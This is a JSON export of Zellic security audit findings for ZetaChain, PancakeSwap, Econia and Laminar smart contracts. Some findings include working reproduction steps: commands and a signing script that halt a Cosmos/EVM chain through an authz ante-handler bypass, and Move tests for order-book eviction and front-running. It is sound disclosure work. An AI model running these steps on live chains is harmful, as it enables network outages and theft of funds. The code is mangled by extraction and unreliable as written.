func (signer *BTCSigner) TryProcessOutTx(send *types.CrossChainTx, outTxMan *OutTxProcessorManager, outTxID string, chainclient ChainClient, zetaBridge *ZetaCoreBridge) { /) [ ...)) ] /) FIXME: config chain params addr, err :) btcutil.DecodeAddress(string(toAddr), config.BitconNetParams) if err !) nil { logger.Error().Err(err).Msgf(\"cannot decode address %s \", send.GetCurrentOutTxParam().Receiver) return } /) [ ...)) ] } Zellic ZetaChain Specifically, the call to btcutil.DecodeAddress() can panic if the toAddr provided to it is not a valid Bitcoin address. This is easily achieved by passing in an EVM-compatible address instead. The following stack trace is observed when the crash occurs: zetaclient0 | panic: runtime error: index out of range [65533] with length zetaclient0 | zetaclient0 | goroutine 12508 [running]: zetaclient0 | github.com/btcsuite/btcutil/base58.Decode({0xc005e9f968, 0x14}) zetaclient0 | ^^I/go/pkg/mod/github.com/btcsuite/btcutil@v1.0.3- 0.20201208143702-a53e38424cce/base58/base58.go:58 +0x305 zetaclient0 | github.com/btcsuite/btcutil/base58.CheckDecode({0xc005e9f968?, 0xc001300000?}) zetaclient0 | ^^I/go/pkg/mod/github.com/btcsuite/btcutil@v1.0.3- 0.20201208143702-a53e38424cce/base58/base58check.go:39 +0x25 zetaclient0 | github.com/btcsuite/btcutil.DecodeAddress({0xc005e9f968?, 0xc0061a6de0?}, 0x458b080) zetaclient0 | ^^I/go/pkg/mod/github.com/btcsuite/btcutil@v1.0.3- 0.20201208143702-a53e38424cce/address.go:182 +0x2aa zetaclient0 | github.com/zeta- chain/zetacore/zetaclient.(*BTCSigner).TryProcessOutTx(0xc004aed680, 0xc006691680, 0xc00053aab0, {0xc00484edc0, 0x4a}, {0x32c9040?, 0xc0050ba200}, 0xc000e9af00) zetaclient0 | ^^I/go/delivery/zeta-node/zetaclient/btc_signer.go:213 +0x893 zetaclient0 | created by github.com/zeta- chain/zetacore/zetaclient.(*CoreObserver).startSendScheduler zetaclient0 | ^^I/go/delivery/zeta- node/zetaclient/zetacore_observer.go:224 +0x1045 The bug demonstrated above is in an external package that is not maintained by the ZetaChain team. Since it is not sustainable to go through and fix any such bugs that arise from the use of external packages, we recommend adding a panic handler to the Zetaclient code so that panics are handled gracefully and preferably logged, so they can be taken care of later. Zellic ZetaChain This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit f2adb252. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.11 Ethermint Ante handler bypass", + "labels": [ + "Zellic" + ], + "body": "Target: app/ante/handler_options.go Category: Coding Mistakes Likelihood: High Severity: High : High It is possible to bypass the EthAnteHandler by wrapping the ethermint.evm.v1.MsgEthe reumTx inside a MsgExec as described in https://jumpcrypto.com/bypassing-ethermint- ante-handlers/. These are responsible for numerous vital actions such as deducting the gas limit from the sender\u2019s account to limit the number computations a contract can perform. It is possible to cause a complete chain halt by deploying a contract with an infinite loop and then calling it with a huge gas limit. Since the coins are not deducted from the senders account, the gas limit will be accepted and the EVM will get stuck in the loop. The following steps can be performed to replicate this issue. 
First, create a new ac- count to simulate a malicious user, then deploy the following contract to the zEVM: /) SPDX-License-Identifier: MIT pragma solidity ^0.8.7; contract Demo { function loop() external { while(true) {} } } Using the details of the malicious account (one can use zetacored keys unsafe-expo rt-eth-key to get the private key) and the deployed contract, sign a transaction and get the hex bytes: import web3 from web3 import Web3 account = \"0x30b254F67cBaB5E6b12b92329b53920DE403aA02\" contract = \"0x6da71267cd63Ec204312b7eD22E02e4E656E72ac\" Zellic ZetaChain private_key = \"xxx\" loop_selector = \"0xa92100cb\" loop_data={\"data\":loop_selector,\"from\": account, \"gas\": \"0xFFFFFFFFFFFFFFF\",\"gasPrice\": \"0x7\",\"to\": contract,\"value\": \"0x0\", \"nonce\": \"0x0\"} w3 = web3.Web3(web3.HTTPProvider(\"http:))localhost:9545\")) print(w3.eth.account.sign_transaction(transaction_dict=nop_data, private_key=private_key)) This can then be used to generate a MsgEthereumTx message, which we then remove the ExtensionOptionsEthereumTx and wrap it in a MsgExec using the authz grant mech- anism: zetacored tx evm raw [TX_HASH] -)generate-only > /tmp/tx.json sed -i 's/{\"@type\":\"\\/ethermint.evm.v1.ExtensionOptionsEthereumTx\"}/)g' /tmp/tx.json zetacored tx -)chain-id athens_101-1 -)keyring-backend=test -)from $hacker authz exec /tmp/tx.json -)fees 20azeta -)yes Since the granter and the grantee are the same in this instance, the grant automatically passes, causing the inner message to be executed and putting the nodes in an infinite loop. It is also possible to steal all the transaction fees for the current block by supplying a higher gas limit that is used. Since the gas was never paid for, when RefundGas is triggered, it will end up sending any gas that was collected from other transactions. Consider adding a new Ante handler base on the AuthzLimiterDecorator that was used to fix the issue in EVMOS; see https://github.com/evmos/evmos/blob/v12.1.2/app/ante/cosmos/authz.go#L58- L91. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 3362b137. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.12 Unbonded validators prevent the TSS vote from passing", + "labels": [ + "Zellic" + ], + "body": "Target: keeper_tss_voter.go Category: Coding Mistakes Likelihood: High Severity: Medium : Medium Bonded validators can cast a vote to add a new TSS by sending a MsgCreateTSSVoter. The issue is that there is a check to allow only bonded validators to vote, but for the vote to pass, the number of signers must be equal to the total number of validators (which includes unbonded/unbonding validators). func (k msgServer) CreateTSSVoter(goCtx context.Context, msg *types.MsgCreateTSSVoter) (*types.MsgCreateTSSVoterResponse, error) { ctx :) sdk.UnwrapSDKContext(goCtx) validators :) k.StakingKeeper.GetAllValidators(ctx) if !IsBondedValidator(msg.Creator, validators) { return nil, sdkerrors.Wrap(sdkerrors.ErrorInvalidSigner, fmt.Sprintf(\"signer %s is not a bonded validator\", msg.Creator)) } /) [ ...)) ] /) this needs full consensus on all validators. 
if len(tssVoter.Signers) =) len(validators) { tss :) types.TSS{ Creator: \"\", Index: tssVoter.Chain, Chain: tssVoter.Chain, Address: tssVoter.Address, Pubkey: tssVoter.Pubkey, Signer: tssVoter.Signers, FinalizedZetaHeight: uint64(ctx.BlockHeader().Height), } k.SetTSS(ctx, tss) } return &types.MsgCreateTSSVoterResponse{}, nil } Zellic ZetaChain If not every validator is a bonded validator, then it is impossible to add a new TSS as the vote can never pass. As anyone can become an unbonded validator, this would be easy to trigger and will likely happen in the course of normal operation as validators will unbond, putting them into an unbonding state. It is also possible for a bonded validator to sign the vote, become unbonded and re- moved, and have the vote still count. The vote should only be passed when the set of currently bonded validators have all signed it. This issue has been acknowledged by ZetaChain. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.1 Precision factor is not precise enough", + "labels": [ + "Zellic" + ], + "body": "Target: pancake::smart_chef Category: Coding Mistakes Likelihood: High Severity: High : High The precision_factor used to avoid division precision errors is not large enough to mitigate truncation to zero errors. The formula for acc_token_per_share is calculated by acc_token_per_share = acc_token_per_share + (reward * precision_factor) / total_stake; and the precision_factor is calculated by let precision_factor = math:)pow(10, (16 - reward_token_decimal)); In the case that total_stake is greater than (reward * precision_factor), which can happen if the average user deposits 100 StakeToken coins of 12 decimals, or one factor smaller of a token of one decimal lower, acc_token_per_share can get truncated to zero via the division. This disables users from getting rewards, with the threat being highly likely for any coin greater than 11 decimals. In a proof of concept, we recreated such a scenario by first minting some users an av- erage of 100 coins of a token of 12 decimals via a pseudo-random number generator and staking them. while (i < 30) { let minted_amount = *vector:)borrow_mut(&mut random_num_vec, i) * pow(10, coin_decimal_scaling); test_coins:)register_and_mint(&coin_owner, vector:)borrow(&signers_vec, i), minted_amount); Zellic PancakeSwap i = i + 1; }; while (i < 30) { deposit(vector:)borrow(&signers_vec, i), coin:)balance(signer:)address_of(vector:)borrow(&signers_vec, i)))); i = i + 1; }; We then increased the timestamp to allow rewards to accrue via the following: timestamp:)update_global_time_for_test_secs(start_time + 30); And finally, we retrieved the reward for each staker through the following code, while (i < 30) { let user_pending_reward = get_pending_reward(signer:)address_of(vector:)borrow(&signers_vec, i))); debug:)print(&user_pending_reward); i = i + 1; }; in which all user_pending_reward outputted a zero value, which indicated no users received any rewards. We provided a full test for PancakeSwap Finance for reproduction. We recommend using a higher precision factor such as in the EVM version or restrict- ing the maximum decimal of the reward and stake coin to no greater than 10. PancakeSwap acknowledged the finding and resolved it in commits 19a751d7 and 390c8744. 
Zellic PancakeSwap", "html_url": "https://github.com/Zellic/publications/blob/master/PancakeSwap Aptos - Zellic Audit Report.pdf" }, { "title": "3.2 Excessive rewards allocation leads to DOS", "labels": [ "Zellic" ], "body": "Target: pancake::smart_chef Category: Coding Mistakes Likelihood: Low Severity: Medium : High First, understand the following variables in the add_reward function: pool_info.historical_add_reward: the total amount of reward LP that the admin has deposited. pool_info.reward_per_second: the maximum amount of reward LP the admin is allowed to deposit per second; the following assertion in add_reward requires that the admin’s new deposit does not cause the historical average reward LP deposit per second to exceed pool_info.reward_per_second: pool_info.historical_add_reward = pool_info.historical_add_reward + amount; assert!(pool_info.reward_per_second * (pool_info.end_timestamp - pool_info.start_timestamp) >= pool_info.historical_add_reward, ERROR_REWARD_MAX); When calculating pool_info.acc_token_per_share using the cal_acc_token_per_share function, we see that the reward-to-stake token ratio is based on reward_per_second, which is the maximum reward LP deposit rate (not the actual deposit rate) multiplied by the period multiplier: let reward = u256::from_u128((reward_per_second as u128) * (multiplier as u128)); Because the ratio is calculated using the maximum reward and the admin can deposit less than this amount, reward payouts may be too large, meaning the protocol can potentially be in deficit, leading to an underflow abort given enough withdrawals. This would require users to emergency_withdraw and forfeit rewards to save their funds. In other words, the reward supply can be lower than it should be: the aforementioned add_reward assertion only requires that the limit >= the actual supply, so the actual supply is always <= the limit. For the reward supply to always be sufficient, it would have to equal the limit. We created tests to prove the existence of this bug and provided them to the customer separately from this report. Zellic PancakeSwap
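As a worked illustration of that deficit, with purely hypothetical numbers: if the cap-based accrual promises more than the admin actually funded, the final withdrawals cannot be paid.

```go
package main

import "fmt"

// Hypothetical numbers: rewards are accrued against the per-second cap,
// while the admin funded less than the cap allows.
func main() {
	const rewardPerSecond = 10 // cap used by the accrual math
	const elapsed = 100        // seconds the pool has been live

	funded := uint64(600)                     // what the admin actually deposited
	owed := uint64(rewardPerSecond * elapsed) // 1000 accrued against the cap

	fmt.Println("owed:", owed, "funded:", funded)
	if owed > funded {
		// In the Move contract this shortfall surfaces as an underflow abort
		// on withdrawal; users must emergency_withdraw and forfeit rewards
		// to recover their stake.
		fmt.Println("unpayable shortfall:", owed-funded)
	}
}
```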
Zellic PancakeSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/PancakeSwap Aptos - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Potential overflow in the add_reward function", + "labels": [ + "Zellic" + ], + "body": "Target: pancake::smart_chef Category: Coding Mistakes Likelihood: Low Severity: Low : High In the add_reward function, there exists the following assertion that checks that the admin is not depositing more reward LP than the pool.historical_add_reward limit: assert!(pool_info.reward_per_second * (pool_info.end_timestamp - pool_info.start_timestamp) >) pool_info.historical_add_reward, ERROR_REWARD_MAX); Note that multiplying these two u64 values may result in an integer overflow\u2014especially since pool_info.reward_per_second will likely be a large number, particularly for re- ward tokens of larger decimals, and the maximum u64 value is only 20 decimals. It is possible for an admin to configure a pool in a way that admins cannot deposit reward LP using the add_reward function. Cast the multiplier and multiplicand values to u256 before the operation: assert!(pool_info.reward_per_second * (pool_info.end_timestamp - pool_info.start_timestamp) >) pool_info.historical_add_reward, ERROR_REWARD_MAX); assert!(u256:)as_u128(u256:)mul( u256:)from_u64(pool_info.reward_per_second), u256:)sub( u256:)from_u64(pool_info.end_timestamp), u256:)from_u64(pool_info.start_timestamp) ) )) >) pool_info.historical_add_reward as u128, ERROR_REWARD_MAX); Zellic PancakeSwap PancakeSwap remediated the issue by taking out pool_info.historical_add_reward in commit 19a751d7. Zellic PancakeSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/PancakeSwap Aptos - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Adversarial order eviction", + "labels": [ + "Zellic" + ], + "body": "Target: econia:)avl_queue Category: Business Logic Likelihood: High Severity: Critical : Critical Econia\u2019s order book is built on an AVL queue. To avoid allowing the data structure to grow too large (incurring excessive gas costs for insertions and deletions), Econia evicts the order with the lowest price-time priority if the AVL queue tree exceeds a critical height. Critical height checking and eviction occur when inserting a new node using the ins ert_check_eviction or insert_evict_tail functions. When placing an order, Econia uses the insert_check_eviction function to update the AVL queue, then cancels any evicted orders: /) Get new AVL queue access key, evictee access key, and evictee /) value by attempting to insert for given critical height. let (avlq_access_key, evictee_access_key, evictee_value) = avl_queue:)insert_check_eviction( orders_ref_mut, price, order, critical_height); /) [...))] if (evictee_access_key =) NIL) { /) If no eviction required: /) Destroy empty evictee value option. option:)destroy_none(evictee_value); } else { /) If had to evict order at AVL queue tail: /) Unpack evicted order, storing fields for event. let Order{size, price, user, custodian_id, order_access_key} = option:)destroy_some(evictee_value); /) Get price of cancelled order. let price_cancel = evictee_access_key & HI_PRICE; /) Cancel order user-side, storing its market order ID. let market_order_id_cancel = user:)cancel_order_internal( user, market_id, custodian_id, side, price_cancel, order_access_key, (NIL as u128)); Zellic Econia Labs /) Emit a maker evict event. 
event:)emit_event(&mut order_book_ref_mut.maker_events, MakerEvent{ market_id, side, market_order_id: market_order_id_cancel, user, custodian_id, type: EVICT, size, price}); }; The protocol does not take a fee when a user places an order, and orders can be cancelled within the same transaction. An attacker can cause legitimate orders to be evicted from the structure, effectively cancelling them. Aptos maximum gas limit allows an attacker to perform the attack in one single transaction, without any risk for the attacker\u2019s assets (temporarily required to be deposited to Econia to place the malicious orders). Aside from the DOS threat for any protocol built on Econia, the vulnerability can have further impacts depending on the protocol. Consider the following examples of pro- tocol types and how they may be impacted by this vulnerability: Decentralized token exchanges: Attackers can use this vulnerability to manipu- late the order book to evict all orders on one side of the book. They could then place orders at arbitrary prices, allowing them to profit from buying or selling assets at an artificial price that does not reflect the market value from unsus- pecting users and bots. This would also impact the trading strategies of users who might not expect their orders to be cancelled. Decentralized margin trading protocols: Attackers can exploit this vulnerability to influence the price of one or more assets, causing margin positions to be liquidated. This scenario is plausible if the margin trading protocol infers asset pricing from order book entries (e.g., using BID or ASK price or mid-market rate) or by looking at the price of recent trade events. Decentralized derivatives markets: Attackers can place orders with a higher price-time priority than what the derivatives traders have set, allowing them to take advantage of the traders\u2019 positions and force them to liquidate at a loss. This can happen if the derivatives market uses the mid-market rate on Econia as the price source, or alternatively, the last trades. This gives the attacker access to the funds that the derivatives trader has deposited in the protocol. Decentralized lending protocols: Attackers can use this vulnerability to manipu- late the order book, allowing them to borrow funds for a lower interest rate than what is actually available on the market. This can happen if the lending protocol uses the mid-market rate on Econia as the price source, or alternatively, the last Zellic Econia Labs trades. This gives them an unfair advantage over legitimate borrowers, allow- ing them to borrow funds at a much lower rate and thus allowing them to steal funds from the protocol. Reproduction steps To perform an attack, an attacker may use the following steps: 1. Place enough limit orders with a higher price-time priority than the target trans- action(s) on the same side (BID/ASK), storing each resulting order ID. The order size must be valid, but it can be any amount. Each order price must be unique; a new price level must exist for each order. The price must not cross the spread, since the order has to be posted on the book. The maximum number of orders required to evict any other order is 2,048 given the critical tree height CRITICAL_HEIGHT of 10 at the time of the audit and given that every illegitimate order has a unique price level. Fewer orders may be re- quired when the order book contains legitimate orders at different price levels with a higher price-time priority than the target order. 
Note that this attack may be funded by a flash loan if the attacker does not have sufficient funds to place the malicious orders. Though a flash loan may take a fee, the profit of an attack using this vulnerability will likely exceed any flash loan fee. 2. Cancel all stored order IDs of illegitimate orders. The attacker\u2019s funds will be returned without any fee being charged. Limit orders evicted in step 1 remain cancelled. We note that the worst case scenario from an attacker\u2019s perspective is evicting all orders from one side of a very liquid market, where the spread is likely negligible and there\u2019s a high concentration of assets near it. It might not be possible to post 2,048 orders at different price levels without crossing the spread in order to evict all orders from one side. This does not prevent the attack, but it will require widening the spread by filling orders on one or both sides of the book, costing some capital. The majority of the capital can likely be recovered, as the orders filled by the attacker are priced near the \u201ccorrect\u201d market rate of the asset. Demonstrative test To demonstrate an attack, we provided the following proof of concept to Econia Labs: Zellic Econia Labs #)test(account = @simulation_account)] fun test_can_cancel_legitimate_order(account: &signer) acquires OrderBooks, Orders { /) initialize markets, users, and an integrator. let (user_0, user_1) = init_markets_users_integrator_test(); let user_2 = account:)create_account_for_test(@user_2); user:)register_market_account( &user_2, MARKET_ID_COIN, NO_CUSTODIAN); /) setup test let (taker_divisor, integrator_divisor) = (incentives:)get_taker_fee_divisor(), incentives:)get_fee_share_divisor(INTEGRATOR_TIER)); let price = integrator_divisor * taker_divisor; let initial_amount_bc = HI_64/2; let initial_amount_qc = HI_64/2; user:)deposit_coins(@user_0, MARKET_ID_COIN, NO_CUSTODIAN, assets:)mint_test(initial_amount_bc)); user:)deposit_coins(@user_0, MARKET_ID_COIN, NO_CUSTODIAN, assets:)mint_test(initial_amount_qc)); user:)deposit_coins(@user_1, MARKET_ID_COIN, NO_CUSTODIAN, assets:)mint_test(initial_amount_bc)); user:)deposit_coins(@user_1, MARKET_ID_COIN, NO_CUSTODIAN, assets:)mint_test(initial_amount_qc)); user:)deposit_coins(@user_2, MARKET_ID_COIN, NO_CUSTODIAN, user:)deposit_coins(@user_2, MARKET_ID_COIN, NO_CUSTODIAN, assets:)mint_test(initial_amount_qc)); assets:)mint_test(initial_amount_bc)); /) #1: place limit order ASK size*4 debug:)print(&1); let (order_id, _, _, _) = place_limit_order_user( &user_0, MARKET_ID_COIN, @integrator, ASK, MIN_SIZE_COIN*4, price, POST_OR_ABORT); debug:)print(&std:)bcs:)to_bytes(&order_id)); /) #2: place limit order BID size (fulfills immediately) debug:)print(&2); Zellic Econia Labs let (order_id, base_traded, quote_traded, fees) = place_limit_order_user( &user_1, MARKET_ID_COIN, @integrator, BID, MIN_SIZE_COIN*1, price, FILL_OR_ABORT); debug:)print(&std:)bcs:)to_bytes(&order_id)); debug:)print(&base_traded); debug:)print("e_traded); debug:)print(&fees); /) #3: spam orders debug:)print(&3); let n_orders = 2048; let i: u64 = 0; let ids: vector = vector:)empty(); while (i < n_orders) { let (order_id, _, _, _) = place_limit_order_user( &user_1, MARKET_ID_COIN, @integrator, ASK, MIN_SIZE_COIN, price-i-1, POST_OR_ABORT); debug:)print(&std:)bcs:)to_bytes(&order_id)); vector:)push_back(&mut ids, order_id); i = i + 1; }; i = 0; while (i < n_orders) { let order_id = vector:)pop_back(&mut ids); cancel_order_user(&user_1, MARKET_ID_COIN, ASK, order_id); i = i + 
1; }; /) #4: place market order BUY debug:)print(&4); let (base_traded, quote_traded, fees) = place_market_order_user( &user_2, MARKET_ID_COIN, @integrator, BUY, 0, MAX_POSSIBLE, 0, MAX_POSSIBLE, price*200); debug:)print(&base_traded); /) should be 0 if #1 was cancelled debug:)print("e_traded); /) should be 0 ^ Zellic Econia Labs debug:)print(&fees); /) should be 0 ^ /) #5: verify there are no ASK orders left since #1 was evicted index_orders_sdk(account, MARKET_ID_COIN); /) Index orders. let orders = borrow_global(@simulation_account); assert!(vector:)length(&orders.asks) =) 0, 0); } The test places a legitimate order, then places 2048 illegitimate orders, cancels all illegitimate orders, then verifies that the legitimate order was also cancelled. There are a few potential approaches to lower the risk of attack, though none of the following strategies is a complete solution. Impose a minimum order size and tick size This would help deter adversarial behavior by requiring more capital to perform the attack. This approach has the advantage of being relatively straightforward to imple- ment. The approach does not eliminate the vulnerability for a well-funded attacker (possibly financed via a flash loan); the profits may easily exceed the cost, especially since the attacker recovers their funds when cancelling their order. Disallowing immediate cancellation of orders This would require storing a sequence number in each user\u2019s order, and it could be imposed either for the current block number (one-block delay required to cancel) or by an account sequence number (a minimum of one transaction delay required to cancel). This strategy has the advantage of making the attack riskier and more costly, as the attacker would now have to wait before being able to cancel the orders and recover their funds; during the delay period, bots may fulfill the high price-level orders. Though, this approach does not eliminate the attack vector because an attacker can still exploit the vulnerability over multiple transactions. Additionally, this strategy may be problematic for market makers, as it would prevent them from quickly cancelling orders. Zellic Econia Labs Increase the critical height for eviction This would make it so that clearing out the order book would take more than 16k dele- tions from the AVL queue, which cannot be done in a single transaction given the cur- rent maximum per-transaction gas limit on Aptos. This strategy has the advantage of being relatively straightforward to implement and could potentially deter a malicious actor. However, it may lead to higher gas costs because Econia must traverse a tree with potentially more price levels. Increasing the maximum size of the order book may also introduce a DOS attack vector where an attacker places many small orders to cause the AVL queue to grow to the point where it is not practical to place orders because of gas fees (or where it is impossible because of the per-transaction gas limit). Econia Labs acknowledged this finding and created a GitHub issue to discuss reme- diations. They provided the following response to our proof of concept: When we were designing the AVL queue we imposed the critical height con- straints basically to prevent the data structure from getting too large: the more tree nodes, the more it costs to insert or delete. Hence the eviction schema, which is supposed to solve a different DOS attack vector: placing a bunch of small orders that grow the tree grows too large and eats up gas. 
Per the eviction approach, if someone places an order far away from the spread, they risk getting evicted if someone comes along with a better order. But as you demonstrated, this approach could lead to adversarial behavior. The critical height of the AVL queue (econia:)market:)CRITICAL_HEIGHT) was increased from 10 to 18 in commit 9b3cada1. This makes it harder for an attacker to exploit this issue without risk, but it does not completely eliminate the issue. The increased critical height requires 16,383 orders to be inserted in order to guarantee fully evicting all the orders on one side of the book (per the calculations provided by the Econia team). This is impossible to accomplish in a single transaction due to the current max compute limit in place on Aptos. However, the attack is still viable if an attacker accepts the risk of some of their ma- licious orders being filled. Note that the capital cost of inserting many orders is not necessarily high and varies on the minimum order size for the market and the price level at which the orders are inserted. Zellic Econia Labs Additionally, an attacker might not be interested in evicting one side of the order book as a whole but might still find advantageous to evict the tail of the orders. In general, an attacker has the ability to choose a price cutoff and evict all orders that have a price that is worse (lower or higher, depending on the side being attacked) by posting malicious orders with a better price. This price does not have to be the best price for the chosen side of the order book, but it can instead be in between other better priced orders (which will not be evicted) and the victim ones. This makes it possible to evict the majority of the orders on the book without significant risk even without doing so in a single transaction, since the malicious orders will not be filled unless all the other better priced ones are filled first. 
Econia Labs provided the following notes: We have added a section to our documentation about the topic and how to avoid making erroneous assumptions as an integrating protocol: https://econia.dev/overview/orders#adversarial-considerations We have started looking into a B+ tree (per discussions with @fcremo ) that is unaffected by eviction behavior, and are considering it as an upgradeable feature pending more research: https://github.com/econia-labs/econia/issues/62 Zellic Econia Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Econia - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Cancelling nonexistent market order IDs aborts", + "labels": [ + "Zellic" + ], + "body": "Target: econia:)market Category: Coding Mistakes Likelihood: Informational Severity: Informational : Informational Cancelling a market order ID that does not exist in the AVL queue ungracefully aborts with the following error: native fun borrow_box_mut(table: &mut Table, key: K): &mut Box; ^^^^^^^^^^^^^^ \u2502 Test was not expected to abort but it aborted with 25863 here In this function in 0x1:)table To reproduce this issue, use the following test: #)test] fun test_nonexistent_market_order_id() acquires OrderBooks { let (_, user_1) = init_markets_users_integrator_test(); let nonexistent_market_order_id = 0xdeadbeef; cancel_order_user(&user_1, MARKET_ID_COIN, ASK, nonexistent_market_order_id); } The function call chain to the offending borrow_box_mut call is market:)cancel_order avl_queue:)remove avl_queue:)remove_list_node avl_queue:)remove_list_node_update_edges The borrow_mut line below causes the transaction to abort: } else { /) If node was not list head: /) Mutably borrow last list node. Zellic Econia Labs let list_node_ref_mut = table_with_length:)borrow_mut( list_nodes_ref_mut, last_node_id); It may be more difficult for developers building on Econia to debug code cancelling a nonexistent market order ID. Assert that the market order ID exists, or otherwise, gracefully exit if the node is not found in the AVL queue. Econia remediated the issue in commit 7549fef. Zellic Econia Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Econia - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Duplicate call in coin register", + "labels": [ + "Zellic" + ], + "body": "Target: dex::stake Category: Coding Mistakes Likelihood: High Severity: High : High The following function register_staking_account calls coin:)register twice via the following snippet: if (!coin:)is_account_registered(addr)) { coin:)register(account); coin:)register(account); }; Users will not be able to register a staking account as the second coin:)register fails due to the following assert statement in the coin:)register function: assert!( !is_account_registered(account_addr), error:)already_exists(ECOIN_STORE_ALREADY_PUBLISHED), ); We recommend removing one of the coin:)register calls. Laminar acknowledged this finding and implemented a fix in commit 691c. Zellic Laminar", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Potential frontrunning in orderbook create", + "labels": [ + "Zellic" + ], + "body": "Target: dex::book Category: Coding Mistakes Likelihood: High Severity: High : High The book:)create_orderbook function calls account:)create_resource_account. The latter takes a signer and a seed to calculate an address and then creates an account at that address. 
This behavior is shown in the following snippet: let seed_guid = account:)create_guid(account); let seed = bcs:)to_bytes(&seed_guid); let (book_signer, book_signer_cap) = account:)create_resource_account(account, seed); If the address of the signer and the seed are known, the address that account:)creat e_resource_account will use can be determined. Therefore, an attacker can front-run book:)create_orderbook by creating an account at the right address, causing book:)c reate_orderbook to revert. The seed and address are trivial to determine; an address is public information and the seed is simply the guid_creation_num member of the Account struct. Therefore, the seed can be read from the blockchain. Affected users will not be allowed to create orderbooks, which will result in them not being able to use the market. The following unit test demonstrates how an attacker could front-run book:)create_ orderbook: #)test(account = @dex)] #)expected_failure] fun create_fake_orderbook(account: &signer) { create_fake_coins(account); let victim_addr = signer:)address_of(account); let guid_creation_num = account:)get_guid_next_creation_num(victim_addr); Zellic Laminar let seed_id = guid:)create_id(victim_addr, guid_creation_num); let seed_guid = GUID { id: seed_id }; let seed = bcs:)to_bytes(&seed_guid); let new_addr = account:)create_resource_address(&victim_addr, seed); aptos_account:)create_account(new_addr); /) Should fail book:)create_orderbook(account, 3, 3, 1000); } We have provided the full PoC to Laminar for reproduction and verification. Consider using a nondeterministic seed to create the resource account. Commit 925e8a4 in aptos-core, introduced by Aptos during the audit prevents the front running of resource accounts via an override if an account exists at the resourc e_addr. let resource = if (exists_at(resource_addr)) { let account = borrow_global(resource_addr); assert!( option:)is_none(&account.signer_capability_offer.for), error:)already_exists(ERESOURCE_ACCCOUNT_EXISTS), ); assert!( account.sequence_number =) 0, error:)invalid_state(EACCOUNT_ALREADY_USED), ); create_signer(resource_addr) Zellic Laminar", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Order checker functions use full order size rather than re- maining order size", + "labels": [ + "Zellic" + ], + "body": "Target: dex::book Category: Coding Mistakes Likelihood: High Severity: High : High book:)can_bid_be_matched and book:)can_ask_be_matched check if an order can be filled using an order book. It intends to add up the remaining sizes on the orders in the order book that can match the bid/ask. However, instead of adding up the remaining sizes of these orders, it adds up the full sizes of these orders, as shown in the example below. let bid_size = (order:)get_size(bid) as u128); This is problematic because some orders may have been partially fulfilled. In some instances the checker functions would count these partially fulfilled orders at their full values. But when the DEX tries to match these orders, it may fill the orders less than book:)can_bid_be_matched/book:)can_ask_be_matched indicated the order could be filled. book:)can_bid_be_matched and book:)can_ask_be_matched may indicate that an order can be fully matched when it is not fully matchable. 
This would cause the following line in book::place_bid_limit_order/book::place_ask_limit_order to revert: assert!(order::get_remaining_size(&order) == 0, ENO_MESSAGE); Change the order::get_size call to order::get_remaining_size. Laminar acknowledged this finding and implemented a fix in commit 0a71.", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Potentially incorrect implementation of multiple queue operations", + "labels": [ + "Zellic" + ], + "body": "Target: flow::queue Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: Medium queue::remove handles index_to_remove three different ways based on whether it is the head, the tail, or neither. In the case index_to_remove is neither, there is an assertion that ensures that the node at prev_index is actually before index_to_remove: assert!(guarded_idx::unguard(prev_node.next) == index_to_remove, EINVALID_REMOVAL); The same check should occur in the case that index_to_remove is the tail, since the previous node is still relevant in this case: let prev_node = vector::borrow_mut(&mut queue.nodes, *option::borrow(&prev_index)); prev_node.next = guarded_idx::sentinel(); Furthermore, queue::remove cannot handle a queue of length one. It will set the head to the sentinel value but not the tail. The following operations will bring about this issue: #[test] #[expected_failure(abort_code=EQUEUE_MALFORMED)] fun test_corrupt_queue_with_remove() { let queue = new(); enqueue(&mut queue, 10); // The third argument is irrelevant remove(&mut queue, 0, option::some(4)); enqueue(&mut queue, 1); } Subsequent queue operations will notice that the head is a sentinel but the tail is not, causing them to abort. Next, in queue::has_next, there is an assertion followed by an if statement and a second assertion that will never fail: assert!(!is_empty(queue), EQUEUE_EMPTY); if (!is_empty(queue) && guarded_idx::is_sentinel(iter.current)) { ... } else { assert!(!guarded_idx::is_sentinel(iter.current), EITERATOR_DONE); ... } The first term of the boolean expression will always evaluate to true, and the assert in the else block will never abort. They are therefore unnecessary and only add gas overhead. Each of the points has the potential to corrupt the queue. However, the impact is more limited since book::move is less likely to use the queue in unintended ways. Modify the implementation of the queue operations described to fix the issues. For the first issue, add the assertion to the else if block. For the second issue, a queue of length one should be handled as a special case, and the queue object should be cleared. For the third issue, remove the first term of the boolean expression in the if statement. Also, remove the first assert in the else block. Laminar acknowledged this finding and implemented a fix in commits 0ceb, d1aa and 7e01. 4 Formal Verification The Move prover allows for formal specifications to be written on Move code, which can provide guarantees on function behavior, as these specifications are exhaustive over every possible input case. During the audit period, we provided Laminar with Move prover specifications, a form of formal verification. We found the prover to be highly effective at evaluating the entirety of certain functions\u2019 behavior and recommend that the Laminar team add more specifications to their code base. 
